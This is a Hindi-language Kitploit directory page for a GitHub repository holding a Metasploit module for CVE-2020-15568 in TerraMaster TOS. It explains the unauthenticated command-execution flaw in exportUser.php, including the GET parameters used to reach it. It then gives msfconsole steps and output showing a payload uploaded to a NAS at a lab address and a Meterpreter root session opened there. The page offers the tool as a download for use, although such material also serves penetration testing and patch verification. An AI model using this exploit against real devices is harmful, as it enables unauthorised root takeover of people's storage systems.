Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
TerraMaster-TOS-CVE-2020-15568 — CVE-2020-15568 Metasploit मॉड्यूल के लिए रिपॉज़िटरी | Kitploit
उपकरण/GitHubGitHub/divinepwner/terramaster-tos-cve-2020-15568
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubdivinepwner/terramaster-tos-cve-2020-15568

TerraMaster-TOS-CVE-2020-15568

CVE-2020-15568 Metasploit मॉड्यूल के लिए रिपॉज़िटरी

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
33 साल पहलेअभी तक समीक्षित नहीं

TerraMaster TOS CVE-2020-15568

CVE-2020-15568 मेटास्प्लॉइट मॉड्यूल के लिए रिपॉजिटरी

संवेदनशील एप्लिकेशन

विवरण

include/exportUser.php फ़ाइल में डायनामिक क्लास विधि आमंत्रण (dynamic class method invocation) भेद्यता मौजूद है, जो TerraMaster डिवाइसों पर रूट विशेषाधिकारों के साथ रिमोट कमांड निष्पादित करने की अनुमति देती है। इस भेद्यता का शोषण करने और विधि को कॉल करने के लिए, संवेदनशील फ़ाइल को कई HTTP GET पैरामीटर प्रदान करने की आवश्यकता होती है। पहली पंक्ति में एप्लिकेशन app.php को शामिल करता है, जो TOS सॉफ्टवेयर के प्रासंगिक कोर क्लासेस को स्वतः लोड करता है। एप्लिकेशन GET पैरामीटर type के मान के आधार पर कार्यवाही निर्धारित करता है। यदि type चर का मान 1 या 2 से भिन्न है, तो संवेदनशील कोड तक पहुँचना संभव है। exportUser.php के स्रोत कोड के अनुसार, एप्लिकेशन को HTTP GET पैरामीटर cla (class का संक्षिप्त रूप), func और opt की आवश्यकता होती है।

अन्य फाइलों की कोड समीक्षा के दौरान भी, यह पाया गया है कि TOS सॉफ्टवेयर में पहले से मौजूद क्लासेस का उपयोग करके इस समस्या का शोषण करने का एक तरीका है। include/class/application.class.php में स्थित PHP क्लास, TOS सॉफ्टवेयर चलाने वाले डिवाइसों पर कमांड निष्पादित करने के लिए सबसे उपयुक्त उम्मीदवार है। चूँकि exportUser.php में कोई प्रमाणीकरण नियंत्रण नहीं है, एक अनधिकृत (unauthenticated) हमलावर के लिए कोड निष्पादन तक पहुँचना संभव है।

सत्यापन चरण

  1. अपने TerraMaster NAS को TOS संस्करण 4.1.24 या उससे नीचे के साथ सेट-अप करें
  2. msfconsole प्रारंभ करें
  3. करें: use exploit/multi/http/terramaster_command_exec
  4. करें set rhost 192.168.1.27
  5. करें: check
root@kitploit:~
[+] 192.168.1.27:80 - The target is vulnerable.

लक्ष्य

root@kitploit:~
Exploit targets:
   Id  Name
   --  ----
   0   Auto

परिदृश्य

root@kitploit:~
msf5 > use exploit/multi/http/terra_master_command_exec 
msf5 exploit(exploit/multi/http/terramaster_command_exec) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 exploit(multi/http/terramaster_command_exec) > run
[+] Payload uploaded to /logs/FJETBHLL/.vatw.php
[+] Payload successfully triggered !
[*] Started bind TCP handler against 192.168.1.27:9090
[*] Sending stage (38288 bytes) to 192.168.1.27
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300
meterpreter > 
टूल डाउनलोड करें